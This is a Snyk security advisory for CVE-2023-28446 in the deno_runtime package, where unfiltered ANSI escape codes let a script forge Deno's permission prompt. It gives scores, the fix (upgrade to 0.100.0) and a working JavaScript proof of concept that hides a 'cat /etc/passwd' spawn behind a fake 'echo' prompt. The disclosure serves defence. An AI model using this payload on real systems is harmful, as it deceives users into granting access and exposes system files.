Homepage
About Snyk

Remote Code Execution (RCE) Affecting deno_runtime package, versions >=0.9.2 <0.100.0

0.0
high
0
10

Snyk CVSS

    Attack Complexity Low
    User Interaction Required
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.16% (53rd percentile)
Expand this section
NVD
8.8 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUST-DENORUNTIME-3373053
  • published 26 Mar 2023
  • disclosed 24 Mar 2023
  • credit LeoDog896
Report a new vulnerability Found a mistake?

Introduced: 24 Mar 2023

CVE-2023-28446 Open this link in a new tab
CWE-150 Open this link in a new tab

How to fix?

Upgrade deno_runtime to version 0.100.0 or higher.

Overview

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper ANSI neutralization. Arbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a op_spawn_child or op_kill prompt and replace it with any desired text.

PoC 

const boldANSI = "\u001b[1m" // bold
const unboldANSI = "\u001b[22m" // unbold

const prompt = `┌ ⚠️  ${boldANSI}Deno requests run access to "echo"${unboldANSI}
├ Requested by \`Deno.Command().output()`

const moveANSIUp = "\u001b[1A" // moves to the start of the line
const clearANSI = "\u001b[2K" // clears the line
const moveANSIStart = "\u001b[1000D" // moves to the start of the line

Deno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({
    cmd: "cat",
    args: ["/etc/passwd"],
    clearEnv: false,
    env: [],
    stdin: "null",
    stdout: "inherit",
    stderr: "piped"
}, moveANSIUp + clearANSI + moveANSIStart + prompt)